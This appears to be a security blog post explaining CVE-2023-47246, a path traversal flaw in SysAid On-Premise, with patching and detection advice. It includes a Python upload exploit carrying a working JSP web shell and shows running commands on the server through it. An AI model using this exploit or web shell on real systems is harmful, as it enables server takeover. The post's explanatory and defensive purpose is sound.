In November 2023, security researchers discovered a dangerous vulnerability (CVE-2023-47246) in the SysAid On-Premise platform, versions before 23.3.36. The bug quickly became a hot topic after attackers in the wild used it to break into systems. In this post, we'll explain how this vulnerability works, how attackers exploit it, and what you can do to stay safe.
What Is CVE-2023-47246?
CVE-2023-47246 is a "path traversal" vulnerability found in SysAid On-Premise, an IT service management platform. Path traversal means an attacker can trick the server into saving files outside of the intended directory, allowing them to write files anywhere on the disk where the server process has permissions—even the web server's root folder.
This flaw is particularly dangerous because SysAid uses Apache Tomcat, a popular web server. If an attacker can upload a malicious JSP (Java Server Page) file to Tomcat's webroot, they can execute arbitrary code on the server.
How Does the Exploit Work?
Attackers usually look for a web endpoint in SysAid that allows file uploads—often intended for things like submitting support tickets with attachments. If the code that handles those uploads doesn't properly check the file path, an attacker can sneak directory traversal sequences (like ../../) into the submitted filename. This moves the uploaded file out of the expected directory and into a sensitive one—like the root directory served by Tomcat.
Once a malicious file (like shell.jsp) exists in the Tomcat webroot, an attacker can access it directly via the browser. Tomcat will treat the JSP file as active code and run it. This lets the attacker take control of the server.
Here's a simplified example showing what an attack might look like
import requests
# Update these values:
TARGET = "http://victim.example.com";
UPLOAD_ENDPOINT = TARGET + "/some/upload/endpoint"
WEBROOT = "../../webapps/ROOT/"
SHELL_NAME = "shell.jsp"
# A basic JSP web shell.
jsp_shell = '''<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
int c;
while ((c = in.read()) != -1) out.print((char)c);
in.close();
}
%>
'''
files = {
# The core trick --
# Use the filename parameter to break out of the intended folder!
"file": (WEBROOT + SHELL_NAME, jsp_shell, "application/octet-stream")
}
data = {
"other_form_fields": "values" # Add any fields required by the API.
}
r = requests.post(UPLOAD_ENDPOINT, files=files, data=data)
if r.status_code == 200:
print("Upload likely succeeded.")
print(f"Now visit {TARGET}/{SHELL_NAME}?cmd=whoami to run commands.")
When run, this will upload a file called shell.jsp to the Tomcat webroot. The attacker can then visit http://victim.example.com/shell.jsp?cmd=whoami and run any Linux command they wish!
Real-World Exploitation
According to the Huntress Labs report, attackers started using this bug in the wild within days of its discovery. Some of the first attacks were tied to a group believed to be associated with ransomware campaigns.
How to Protect Yourself
1. Patch! Download and install SysAid On-Premise version 23.3.36 or later. Official advisory here.
2. Search for Malicious Files: Check your Tomcat webroot (often /opt/sysaid/tomcat/webapps/ROOT/ or similar) for unexpected .jsp files. Remove anything suspicious.
3. Audit Uploads: Review your system logs for file upload activity, especially with suspicious filenames including ../ or targeting directories outside of the intended upload folder.
Resources & References
- SysAid Security Advisory (Official)
- Huntress Labs (In-the-wild Exploitation)
- NIST NVD Entry for CVE-2023-47246
Conclusion
CVE-2023-47246 exemplifies how a simple coding mistake—failing to sanitize file paths—can lead to full server compromise. If you run SysAid On-Premise, patch immediately, check your server, and make sure your uploads can't be abused in this way. Cybercriminals move fast when these bugs make headlines, so don't wait!
Timeline
Published on: 11/10/2023 06:15:30 UTC
Last modified on: 11/13/2023 17:28:37 UTC